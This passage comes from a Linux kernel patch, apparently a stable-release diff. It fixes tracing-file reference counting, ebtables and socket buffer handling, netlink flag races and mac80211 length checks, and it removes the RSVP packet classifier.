++
++	return 0;
++}
++
++int tracing_release_file_tr(struct inode *inode, struct file *filp)
++{
++	struct trace_event_file *file = inode->i_private;
++
++	trace_array_put(file->tr);
++
++	return 0;
++}
++
+ static int tracing_mark_open(struct inode *inode, struct file *filp)
+ {
+ 	stream_open(inode, filp);
+@@ -6604,14 +6631,18 @@ static ssize_t
+ tracing_max_lat_read(struct file *filp, char __user *ubuf,
+ 		     size_t cnt, loff_t *ppos)
+ {
+-	return tracing_nsecs_read(filp->private_data, ubuf, cnt, ppos);
++	struct trace_array *tr = filp->private_data;
++
++	return tracing_nsecs_read(&tr->max_latency, ubuf, cnt, ppos);
+ }
+ 
+ static ssize_t
+ tracing_max_lat_write(struct file *filp, const char __user *ubuf,
+ 		      size_t cnt, loff_t *ppos)
+ {
+-	return tracing_nsecs_write(filp->private_data, ubuf, cnt, ppos);
++	struct trace_array *tr = filp->private_data;
++
++	return tracing_nsecs_write(&tr->max_latency, ubuf, cnt, ppos);
+ }
+ 
+ #endif
+@@ -7668,18 +7699,20 @@ static const struct file_operations tracing_thresh_fops = {
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+ static const struct file_operations tracing_max_lat_fops = {
+-	.open		= tracing_open_generic,
++	.open		= tracing_open_generic_tr,
+ 	.read		= tracing_max_lat_read,
+ 	.write		= tracing_max_lat_write,
+ 	.llseek		= generic_file_llseek,
++	.release	= tracing_release_generic_tr,
+ };
+ #endif
+ 
+ static const struct file_operations set_tracer_fops = {
+-	.open		= tracing_open_generic,
++	.open		= tracing_open_generic_tr,
+ 	.read		= tracing_set_trace_read,
+ 	.write		= tracing_set_trace_write,
+ 	.llseek		= generic_file_llseek,
++	.release	= tracing_release_generic_tr,
+ };
+ 
+ static const struct file_operations tracing_pipe_fops = {
+@@ -8872,12 +8905,33 @@ trace_options_write(struct file *filp, const char __user *ubuf, size_t cnt,
+ 	return cnt;
+ }
+ 
++static int tracing_open_options(struct inode *inode, struct file *filp)
++{
++	struct trace_option_dentry *topt = inode->i_private;
++	int ret;
++
++	ret = tracing_check_open_get_tr(topt->tr);
++	if (ret)
++		return ret;
++
++	filp->private_data = inode->i_private;
++	return 0;
++}
++
++static int tracing_release_options(struct inode *inode, struct file *file)
++{
++	struct trace_option_dentry *topt = file->private_data;
++
++	trace_array_put(topt->tr);
++	return 0;
++}
+ 
+ static const struct file_operations trace_options_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_options,
+ 	.read = trace_options_read,
+ 	.write = trace_options_write,
+ 	.llseek	= generic_file_llseek,
++	.release = tracing_release_options,
+ };
+ 
+ /*
+diff --git a/kernel/trace/trace.h b/kernel/trace/trace.h
+index dbb86b0dd3b7b..7e6d5101bdb05 100644
+--- a/kernel/trace/trace.h
++++ b/kernel/trace/trace.h
+@@ -590,6 +590,8 @@ void tracing_reset_all_online_cpus(void);
+ void tracing_reset_all_online_cpus_unlocked(void);
+ int tracing_open_generic(struct inode *inode, struct file *filp);
+ int tracing_open_generic_tr(struct inode *inode, struct file *filp);
++int tracing_open_file_tr(struct inode *inode, struct file *filp);
++int tracing_release_file_tr(struct inode *inode, struct file *filp);
+ bool tracing_is_disabled(void);
+ bool tracer_tracing_is_on(struct trace_array *tr);
+ void tracer_tracing_on(struct trace_array *tr);
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 0447c46ef4d71..9da418442a063 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -2101,9 +2101,10 @@ static const struct file_operations ftrace_set_event_notrace_pid_fops = {
+ };
+ 
+ static const struct file_operations ftrace_enable_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_enable_read,
+ 	.write = event_enable_write,
++	.release = tracing_release_file_tr,
+ 	.llseek = default_llseek,
+ };
+ 
+@@ -2120,9 +2121,10 @@ static const struct file_operations ftrace_event_id_fops = {
+ };
+ 
+ static const struct file_operations ftrace_event_filter_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_filter_read,
+ 	.write = event_filter_write,
++	.release = tracing_release_file_tr,
+ 	.llseek = default_llseek,
+ };
+ 
+diff --git a/kernel/trace/trace_events_inject.c b/kernel/trace/trace_events_inject.c
+index d6b4935a78c08..dbecfbb73d237 100644
+--- a/kernel/trace/trace_events_inject.c
++++ b/kernel/trace/trace_events_inject.c
+@@ -328,7 +328,8 @@ event_inject_read(struct file *file, char __user *buf, size_t size,
+ }
+ 
+ const struct file_operations event_inject_fops = {
+-	.open = tracing_open_generic,
++	.open = tracing_open_file_tr,
+ 	.read = event_inject_read,
+ 	.write = event_inject_write,
++	.release = tracing_release_file_tr,
+ };
+diff --git a/lib/kobject.c b/lib/kobject.c
+index aa375a5d94419..207fd22ad3bde 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -850,6 +850,11 @@ int kset_register(struct kset *k)
+ 	if (!k)
+ 		return -EINVAL;
+ 
++	if (!k->kobj.ktype) {
++		pr_err("must have a ktype to be initialized properly!\n");
++		return -EINVAL;
++	}
++
+ 	kset_init(k);
+ 	err = kobject_add_internal(&k->kobj);
+ 	if (err)
+diff --git a/lib/mpi/mpi-cmp.c b/lib/mpi/mpi-cmp.c
+index c4cfa3ff05818..0835b6213235e 100644
+--- a/lib/mpi/mpi-cmp.c
++++ b/lib/mpi/mpi-cmp.c
+@@ -25,8 +25,12 @@ int mpi_cmp_ui(MPI u, unsigned long v)
+ 	mpi_limb_t limb = v;
+ 
+ 	mpi_normalize(u);
+-	if (!u->nlimbs && !limb)
+-		return 0;
++	if (u->nlimbs == 0) {
++		if (v == 0)
++			return 0;
++		else
++			return -1;
++	}
+ 	if (u->sign)
+ 		return -1;
+ 	if (u->nlimbs > 1)
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 0a403b241718e..67b6d8238b3ed 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3841,6 +3841,10 @@ static ssize_t mem_cgroup_write(struct kernfs_open_file *of,
+ 		case _MEMSWAP:
+ 			ret = mem_cgroup_resize_max(memcg, nr_pages, true);
+ 			break;
++		case _KMEM:
++			/* kmem.limit_in_bytes is deprecated. */
++			ret = -EOPNOTSUPP;
++			break;
+ 		case _TCP:
+ 			ret = memcg_update_tcp_max(memcg, nr_pages);
+ 			break;
+@@ -5051,6 +5055,12 @@ static struct cftype mem_cgroup_legacy_files[] = {
+ 		.seq_show = memcg_numa_stat_show,
+ 	},
+ #endif
++	{
++		.name = "kmem.limit_in_bytes",
++		.private = MEMFILE_PRIVATE(_KMEM, RES_LIMIT),
++		.write = mem_cgroup_write,
++		.read_u64 = mem_cgroup_read_u64,
++	},
+ 	{
+ 		.name = "kmem.usage_in_bytes",
+ 		.private = MEMFILE_PRIVATE(_KMEM, RES_USAGE),
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 146553c0054f6..fa4dd5fab0d44 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2436,6 +2436,9 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 	if (hci_dev_test_flag(hdev, HCI_USER_CHANNEL))
+ 		return NOTIFY_DONE;
+ 
++	/* To avoid a potential race with hci_unregister_dev. */
++	hci_dev_hold(hdev);
++
+ 	if (action == PM_SUSPEND_PREPARE)
+ 		ret = hci_suspend_dev(hdev);
+ 	else if (action == PM_POST_SUSPEND)
+@@ -2445,6 +2448,7 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 		bt_dev_err(hdev, "Suspend notifier action (%lu) failed: %d",
+ 			   action, ret);
+ 
++	hci_dev_put(hdev);
+ 	return NOTIFY_DONE;
+ }
+ 
+diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c
+index 757ec46fc45a0..aa23479b20b2a 100644
+--- a/net/bridge/netfilter/ebtables.c
++++ b/net/bridge/netfilter/ebtables.c
+@@ -2115,8 +2115,7 @@ static int size_entry_mwt(const struct ebt_entry *entry, const unsigned char *ba
+ 		return ret;
+ 
+ 	offsets[0] = sizeof(struct ebt_entry); /* matches come first */
+-	memcpy(&offsets[1], &entry->watchers_offset,
+-			sizeof(offsets) - sizeof(offsets[0]));
++	memcpy(&offsets[1], &entry->offsets, sizeof(entry->offsets));
+ 
+ 	if (state->buf_kern_start) {
+ 		buf_start = state->buf_kern_start + state->buf_kern_offset;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index e5858fa5d6d57..0ee2e33bbe5f8 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1774,14 +1774,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case SO_PEERNAME:
+ 	{
+-		char address[128];
++		struct sockaddr_storage address;
+ 
+-		lv = sock->ops->getname(sock, (struct sockaddr *)address, 2);
++		lv = sock->ops->getname(sock, (struct sockaddr *)&address, 2);
+ 		if (lv < 0)
+ 			return -ENOTCONN;
+ 		if (lv < len)
+ 			return -EINVAL;
+-		if (copy_to_sockptr(optval, address, len))
++		if (copy_to_sockptr(optval, &address, len))
+ 			return -EFAULT;
+ 		goto lenout;
+ 	}
+diff --git a/net/devlink/leftover.c b/net/devlink/leftover.c
+index 63188d6a50fe9..032c7af065cd9 100644
+--- a/net/devlink/leftover.c
++++ b/net/devlink/leftover.c
+@@ -5218,7 +5218,7 @@ static int devlink_param_get(struct devlink *devlink,
+ 			     const struct devlink_param *param,
+ 			     struct devlink_param_gset_ctx *ctx)
+ {
+-	if (!param->get || devlink->reload_failed)
++	if (!param->get)
+ 		return -EOPNOTSUPP;
+ 	return param->get(devlink, param->id, ctx);
+ }
+@@ -5227,7 +5227,7 @@ static int devlink_param_set(struct devlink *devlink,
+ 			     const struct devlink_param *param,
+ 			     struct devlink_param_gset_ctx *ctx)
+ {
+-	if (!param->set || devlink->reload_failed)
++	if (!param->set)
+ 		return -EOPNOTSUPP;
+ 	return param->set(devlink, param->id, ctx);
+ }
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index ebd2cea5b7d7a..66908ce2dd116 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -234,7 +234,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 	net_dbg_ratelimited("%s: No header cache and no neighbour!\n",
+ 			    __func__);
+ 	kfree_skb_reason(skb, SKB_DROP_REASON_NEIGH_CREATEFAIL);
+-	return -EINVAL;
++	return PTR_ERR(neigh);
+ }
+ 
+ static int ip_finish_output_gso(struct net *net, struct sock *sk,
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 23a44edcb11f7..cf3453b532d67 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -3991,19 +3991,20 @@ static int ieee80211_probe_client(struct wiphy *wiphy, struct net_device *dev,
+ 	mutex_lock(&local->mtx);
+ 
+ 	rcu_read_lock();
++	sta = sta_info_get_bss(sdata, peer);
++	if (!sta) {
++		ret = -ENOLINK;
++		goto unlock;
++	}
++
++	qos = sta->sta.wme;
++
+ 	chanctx_conf = rcu_dereference(sdata->vif.bss_conf.chanctx_conf);
+ 	if (WARN_ON(!chanctx_conf)) {
+ 		ret = -EINVAL;
+ 		goto unlock;
+ 	}
+ 	band = chanctx_conf->def.chan->band;
+-	sta = sta_info_get_bss(sdata, peer);
+-	if (sta) {
+-		qos = sta->sta.wme;
+-	} else {
+-		ret = -ENOLINK;
+-		goto unlock;
+-	}
+ 
+ 	if (qos) {
+ 		fc = cpu_to_le16(IEEE80211_FTYPE_DATA |
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 55dc0610e8633..c4c80037df91d 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -3625,6 +3625,10 @@ ieee80211_rx_h_action(struct ieee80211_rx_data *rx)
+ 			break;
+ 		goto queue;
+ 	case WLAN_CATEGORY_S1G:
++		if (len < offsetofend(typeof(*mgmt),
++				      u.action.u.s1g.action_code))
++			break;
++
+ 		switch (mgmt->u.action.u.s1g.action_code) {
+ 		case WLAN_S1G_TWT_SETUP:
+ 		case WLAN_S1G_TWT_TEARDOWN:
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index ed123cf462afe..387e430a35ccc 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -84,7 +84,7 @@ struct listeners {
+ 
+ static inline int netlink_is_kernel(struct sock *sk)
+ {
+-	return nlk_sk(sk)->flags & NETLINK_F_KERNEL_SOCKET;
++	return nlk_test_bit(KERNEL_SOCKET, sk);
+ }
+ 
+ struct netlink_table *nl_table __read_mostly;
+@@ -349,9 +349,7 @@ static void netlink_deliver_tap_kernel(struct sock *dst, struct sock *src,
+ 
+ static void netlink_overrun(struct sock *sk)
+ {
+-	struct netlink_sock *nlk = nlk_sk(sk);
+-
+-	if (!(nlk->flags & NETLINK_F_RECV_NO_ENOBUFS)) {
++	if (!nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		if (!test_and_set_bit(NETLINK_S_CONGESTED,
+ 				      &nlk_sk(sk)->state)) {
+ 			sk->sk_err = ENOBUFS;
+@@ -1391,9 +1389,7 @@ EXPORT_SYMBOL_GPL(netlink_has_listeners);
+ 
+ bool netlink_strict_get_check(struct sk_buff *skb)
+ {
+-	const struct netlink_sock *nlk = nlk_sk(NETLINK_CB(skb).sk);
+-
+-	return nlk->flags & NETLINK_F_STRICT_CHK;
++	return nlk_test_bit(STRICT_CHK, NETLINK_CB(skb).sk);
+ }
+ EXPORT_SYMBOL_GPL(netlink_strict_get_check);
+ 
+@@ -1437,7 +1433,7 @@ static void do_one_broadcast(struct sock *sk,
+ 		return;
+ 
+ 	if (!net_eq(sock_net(sk), p->net)) {
+-		if (!(nlk->flags & NETLINK_F_LISTEN_ALL_NSID))
++		if (!nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 			return;
+ 
+ 		if (!peernet_has_id(sock_net(sk), p->net))
+@@ -1470,7 +1466,7 @@ static void do_one_broadcast(struct sock *sk,
+ 		netlink_overrun(sk);
+ 		/* Clone failed. Notify ALL listeners. */
+ 		p->failure = 1;
+-		if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++		if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 			p->delivery_failure = 1;
+ 		goto out;
+ 	}
+@@ -1485,7 +1481,7 @@ static void do_one_broadcast(struct sock *sk,
+ 	val = netlink_broadcast_deliver(sk, p->skb2);
+ 	if (val < 0) {
+ 		netlink_overrun(sk);
+-		if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++		if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 			p->delivery_failure = 1;
+ 	} else {
+ 		p->congested |= val;
+@@ -1565,7 +1561,7 @@ static int do_one_set_err(struct sock *sk, struct netlink_set_err_data *p)
+ 	    !test_bit(p->group - 1, nlk->groups))
+ 		goto out;
+ 
+-	if (p->code == ENOBUFS && nlk->flags & NETLINK_F_RECV_NO_ENOBUFS) {
++	if (p->code == ENOBUFS && nlk_test_bit(RECV_NO_ENOBUFS, sk)) {
+ 		ret = 1;
+ 		goto out;
+ 	}
+@@ -1632,7 +1628,7 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+ 	unsigned int val = 0;
+-	int err;
++	int nr = -1;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1643,14 +1639,12 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (val)
+-			nlk->flags |= NETLINK_F_RECV_PKTINFO;
+-		else
+-			nlk->flags &= ~NETLINK_F_RECV_PKTINFO;
+-		err = 0;
++		nr = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_ADD_MEMBERSHIP:
+ 	case NETLINK_DROP_MEMBERSHIP: {
++		int err;
++
+ 		if (!netlink_allowed(sock, NL_CFG_F_NONROOT_RECV))
+ 			return -EPERM;
+ 		err = netlink_realloc_groups(sk);
+@@ -1670,61 +1664,38 @@ static int netlink_setsockopt(struct socket *sock, int level, int optname,
+ 		if (optname == NETLINK_DROP_MEMBERSHIP && nlk->netlink_unbind)
+ 			nlk->netlink_unbind(sock_net(sk), val);
+ 
+-		err = 0;
+ 		break;
+ 	}
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (val)
+-			nlk->flags |= NETLINK_F_BROADCAST_SEND_ERROR;
+-		else
+-			nlk->flags &= ~NETLINK_F_BROADCAST_SEND_ERROR;
+-		err = 0;
++		nr = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
++		assign_bit(NETLINK_F_RECV_NO_ENOBUFS, &nlk->flags, val);
+ 		if (val) {
+-			nlk->flags |= NETLINK_F_RECV_NO_ENOBUFS;
+ 			clear_bit(NETLINK_S_CONGESTED, &nlk->state);
+ 			wake_up_interruptible(&nlk->wait);
+-		} else {
+-			nlk->flags &= ~NETLINK_F_RECV_NO_ENOBUFS;
+ 		}
+-		err = 0;
+ 		break;
+ 	case NETLINK_LISTEN_ALL_NSID:
+ 		if (!ns_capable(sock_net(sk)->user_ns, CAP_NET_BROADCAST))
+ 			return -EPERM;
+-
+-		if (val)
+-			nlk->flags |= NETLINK_F_LISTEN_ALL_NSID;
+-		else
+-			nlk->flags &= ~NETLINK_F_LISTEN_ALL_NSID;
+-		err = 0;
++		nr = NETLINK_F_LISTEN_ALL_NSID;
+ 		break;
+ 	case NETLINK_CAP_ACK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_CAP_ACK;
+-		else
+-			nlk->flags &= ~NETLINK_F_CAP_ACK;
+-		err = 0;
++		nr = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_EXT_ACK;
+-		else
+-			nlk->flags &= ~NETLINK_F_EXT_ACK;
+-		err = 0;
++		nr = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (val)
+-			nlk->flags |= NETLINK_F_STRICT_CHK;
+-		else
+-			nlk->flags &= ~NETLINK_F_STRICT_CHK;
+-		err = 0;
++		nr = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++	if (nr >= 0)
++		assign_bit(nr, &nlk->flags, val);
++	return 0;
+ }
+ 
+ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+@@ -1791,7 +1762,7 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		return -EINVAL;
+ 
+ 	len = sizeof(int);
+-	val = nlk->flags & flag ? 1 : 0;
++	val = test_bit(flag, &nlk->flags);
+ 
+ 	if (put_user(len, optlen) ||
+ 	    copy_to_user(optval, &val, len))
+@@ -1968,9 +1939,9 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		msg->msg_namelen = sizeof(*addr);
+ 	}
+ 
+-	if (nlk->flags & NETLINK_F_RECV_PKTINFO)
++	if (nlk_test_bit(RECV_PKTINFO, sk))
+ 		netlink_cmsg_recv_pktinfo(msg, skb);
+-	if (nlk->flags & NETLINK_F_LISTEN_ALL_NSID)
++	if (nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 		netlink_cmsg_listen_all_nsid(sk, msg, skb);
+ 
+ 	memset(&scm, 0, sizeof(scm));
+@@ -2047,7 +2018,7 @@ __netlink_kernel_create(struct net *net, int unit, struct module *module,
+ 		goto out_sock_release;
+ 
+ 	nlk = nlk_sk(sk);
+-	nlk->flags |= NETLINK_F_KERNEL_SOCKET;
++	set_bit(NETLINK_F_KERNEL_SOCKET, &nlk->flags);
+ 
+ 	netlink_table_grab();
+ 	if (!nl_table[unit].registered) {
+@@ -2183,7 +2154,7 @@ static int netlink_dump_done(struct netlink_sock *nlk, struct sk_buff *skb,
+ 	nl_dump_check_consistent(cb, nlh);
+ 	memcpy(nlmsg_data(nlh), &nlk->dump_done_errno, sizeof(nlk->dump_done_errno));
+ 
+-	if (extack->_msg && nlk->flags & NETLINK_F_EXT_ACK) {
++	if (extack->_msg && test_bit(NETLINK_F_EXT_ACK, &nlk->flags)) {
+ 		nlh->nlmsg_flags |= NLM_F_ACK_TLVS;
+ 		if (!nla_put_string(skb, NLMSGERR_ATTR_MSG, extack->_msg))
+ 			nlmsg_end(skb, nlh);
+@@ -2312,8 +2283,8 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 			 const struct nlmsghdr *nlh,
+ 			 struct netlink_dump_control *control)
+ {
+-	struct netlink_sock *nlk, *nlk2;
+ 	struct netlink_callback *cb;
++	struct netlink_sock *nlk;
+ 	struct sock *sk;
+ 	int ret;
+ 
+@@ -2348,8 +2319,7 @@ int __netlink_dump_start(struct sock *ssk, struct sk_buff *skb,
+ 	cb->min_dump_alloc = control->min_dump_alloc;
+ 	cb->skb = skb;
+ 
+-	nlk2 = nlk_sk(NETLINK_CB(skb).sk);
+-	cb->strict_check = !!(nlk2->flags & NETLINK_F_STRICT_CHK);
++	cb->strict_check = nlk_test_bit(STRICT_CHK, NETLINK_CB(skb).sk);
+ 
+ 	if (control->start) {
+ 		ret = control->start(cb);
+@@ -2391,7 +2361,7 @@ netlink_ack_tlv_len(struct netlink_sock *nlk, int err,
+ {
+ 	size_t tlvlen;
+ 
+-	if (!extack || !(nlk->flags & NETLINK_F_EXT_ACK))
++	if (!extack || !test_bit(NETLINK_F_EXT_ACK, &nlk->flags))
+ 		return 0;
+ 
+ 	tlvlen = 0;
+@@ -2463,7 +2433,7 @@ void netlink_ack(struct sk_buff *in_skb, struct nlmsghdr *nlh, int err,
+ 	 * requests to cap the error message, and get extra error data if
+ 	 * requested.
+ 	 */
+-	if (err && !(nlk->flags & NETLINK_F_CAP_ACK))
++	if (err && !test_bit(NETLINK_F_CAP_ACK, &nlk->flags))
+ 		payload += nlmsg_len(nlh);
+ 	else
+ 		flags |= NLM_F_CAPPED;
+diff --git a/net/netlink/af_netlink.h b/net/netlink/af_netlink.h
+index 5f454c8de6a4d..b30b8fc760f71 100644
+--- a/net/netlink/af_netlink.h
++++ b/net/netlink/af_netlink.h
+@@ -8,14 +8,16 @@
+ #include <net/sock.h>
+ 
+ /* flags */
+-#define NETLINK_F_KERNEL_SOCKET		0x1
+-#define NETLINK_F_RECV_PKTINFO		0x2
+-#define NETLINK_F_BROADCAST_SEND_ERROR	0x4
+-#define NETLINK_F_RECV_NO_ENOBUFS	0x8
+-#define NETLINK_F_LISTEN_ALL_NSID	0x10
+-#define NETLINK_F_CAP_ACK		0x20
+-#define NETLINK_F_EXT_ACK		0x40
+-#define NETLINK_F_STRICT_CHK		0x80
++enum {
++	NETLINK_F_KERNEL_SOCKET,
++	NETLINK_F_RECV_PKTINFO,
++	NETLINK_F_BROADCAST_SEND_ERROR,
++	NETLINK_F_RECV_NO_ENOBUFS,
++	NETLINK_F_LISTEN_ALL_NSID,
++	NETLINK_F_CAP_ACK,
++	NETLINK_F_EXT_ACK,
++	NETLINK_F_STRICT_CHK,
++};
+ 
+ #define NLGRPSZ(x)	(ALIGN(x, sizeof(unsigned long) * 8) / 8)
+ #define NLGRPLONGS(x)	(NLGRPSZ(x)/sizeof(unsigned long))
+@@ -23,10 +25,10 @@
+ struct netlink_sock {
+ 	/* struct sock has to be the first member of netlink_sock */
+ 	struct sock		sk;
++	unsigned long		flags;
+ 	u32			portid;
+ 	u32			dst_portid;
+ 	u32			dst_group;
+-	u32			flags;
+ 	u32			subscriptions;
+ 	u32			ngroups;
+ 	unsigned long		*groups;
+@@ -54,6 +56,8 @@ static inline struct netlink_sock *nlk_sk(struct sock *sk)
+ 	return container_of(sk, struct netlink_sock, sk);
+ }
+ 
++#define nlk_test_bit(nr, sk) test_bit(NETLINK_F_##nr, &nlk_sk(sk)->flags)
++
+ struct netlink_table {
+ 	struct rhashtable	hash;
+ 	struct hlist_head	mc_list;
+diff --git a/net/netlink/diag.c b/net/netlink/diag.c
+index e4f21b1067bcc..9c4f231be2757 100644
+--- a/net/netlink/diag.c
++++ b/net/netlink/diag.c
+@@ -27,15 +27,15 @@ static int sk_diag_put_flags(struct sock *sk, struct sk_buff *skb)
+ 
+ 	if (nlk->cb_running)
+ 		flags |= NDIAG_FLAG_CB_RUNNING;
+-	if (nlk->flags & NETLINK_F_RECV_PKTINFO)
++	if (nlk_test_bit(RECV_PKTINFO, sk))
+ 		flags |= NDIAG_FLAG_PKTINFO;
+-	if (nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR)
++	if (nlk_test_bit(BROADCAST_SEND_ERROR, sk))
+ 		flags |= NDIAG_FLAG_BROADCAST_ERROR;
+-	if (nlk->flags & NETLINK_F_RECV_NO_ENOBUFS)
++	if (nlk_test_bit(RECV_NO_ENOBUFS, sk))
+ 		flags |= NDIAG_FLAG_NO_ENOBUFS;
+-	if (nlk->flags & NETLINK_F_LISTEN_ALL_NSID)
++	if (nlk_test_bit(LISTEN_ALL_NSID, sk))
+ 		flags |= NDIAG_FLAG_LISTEN_ALL_NSID;
+-	if (nlk->flags & NETLINK_F_CAP_ACK)
++	if (nlk_test_bit(CAP_ACK, sk))
+ 		flags |= NDIAG_FLAG_CAP_ACK;
+ 
+ 	return nla_put_u32(skb, NETLINK_DIAG_FLAGS, flags);
+diff --git a/net/sched/Kconfig b/net/sched/Kconfig
+index bcdd6e925343f..24cf0bf7c80e5 100644
+--- a/net/sched/Kconfig
++++ b/net/sched/Kconfig
+@@ -548,34 +548,6 @@ config CLS_U32_MARK
+ 	help
+ 	  Say Y here to be able to use netfilter marks as u32 key.
+ 
+-config NET_CLS_RSVP
+-	tristate "IPv4 Resource Reservation Protocol (RSVP)"
+-	select NET_CLS
+-	help
+-	  The Resource Reservation Protocol (RSVP) permits end systems to
+-	  request a minimum and maximum data flow rate for a connection; this
+-	  is important for real time data such as streaming sound or video.
+-
+-	  Say Y here if you want to be able to classify outgoing packets based
+-	  on their RSVP requests.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_rsvp.
+-
+-config NET_CLS_RSVP6
+-	tristate "IPv6 Resource Reservation Protocol (RSVP6)"
+-	select NET_CLS
+-	help
+-	  The Resource Reservation Protocol (RSVP) permits end systems to
+-	  request a minimum and maximum data flow rate for a connection; this
+-	  is important for real time data such as streaming sound or video.
+-
+-	  Say Y here if you want to be able to classify outgoing packets based
+-	  on their RSVP requests and you are using the IPv6 protocol.
+-
+-	  To compile this code as a module, choose M here: the
+-	  module will be called cls_rsvp6.
+-
+ config NET_CLS_FLOW
+ 	tristate "Flow classifier"
+ 	select NET_CLS
+diff --git a/net/sched/Makefile b/net/sched/Makefile
+index b7dbac5c519f6..8a33a35fc50d5 100644
+--- a/net/sched/Makefile
++++ b/net/sched/Makefile
+@@ -69,8 +69,6 @@ obj-$(CONFIG_NET_SCH_TAPRIO)	+= sch_taprio.o
+ obj-$(CONFIG_NET_CLS_U32)	+= cls_u32.o
+ obj-$(CONFIG_NET_CLS_ROUTE4)	+= cls_route.o
+ obj-$(CONFIG_NET_CLS_FW)	+= cls_fw.o
+-obj-$(CONFIG_NET_CLS_RSVP)	+= cls_rsvp.o
+-obj-$(CONFIG_NET_CLS_RSVP6)	+= cls_rsvp6.o
+ obj-$(CONFIG_NET_CLS_BASIC)	+= cls_basic.o
+ obj-$(CONFIG_NET_CLS_FLOW)	+= cls_flow.o
+ obj-$(CONFIG_NET_CLS_CGROUP)	+= cls_cgroup.o
+diff --git a/net/sched/cls_rsvp.c b/net/sched/cls_rsvp.c
+deleted file mode 100644
+index de1c1d4da5977..0000000000000
+--- a/net/sched/cls_rsvp.c
++++ /dev/null
+@@ -1,24 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/cls_rsvp.c	Special RSVP packet classifier for IPv4.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <net/ip.h>
+-#include <net/netlink.h>
+-#include <net/act_api.h>
+-#include <net/pkt_cls.h>
+-
+-#define RSVP_DST_LEN	1
+-#define RSVP_ID		"rsvp"
+-#define RSVP_OPS	cls_rsvp_ops
+-
+-#include "cls_rsvp.h"
+-MODULE_LICENSE("GPL");
+diff --git a/net/sched/cls_rsvp.h b/net/sched/cls_rsvp.h
+deleted file mode 100644
+index b00a7dbd05874..0000000000000
+--- a/net/sched/cls_rsvp.h
++++ /dev/null
+@@ -1,764 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * net/sched/cls_rsvp.h	Template file for RSVPv[46] classifiers.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-/*
+-   Comparing to general packet classification problem,
+-   RSVP needs only several relatively simple rules:
+-
+-   * (dst, protocol) are always specified,
+-     so that we are able to hash them.
+-   * src may be exact, or may be wildcard, so that
+-     we can keep a hash table plus one wildcard entry.
+-   * source port (or flow label) is important only if src is given.
+-
+-   IMPLEMENTATION.
+-
+-   We use a two level hash table: The top level is keyed by
+-   destination address and protocol ID, every bucket contains a list
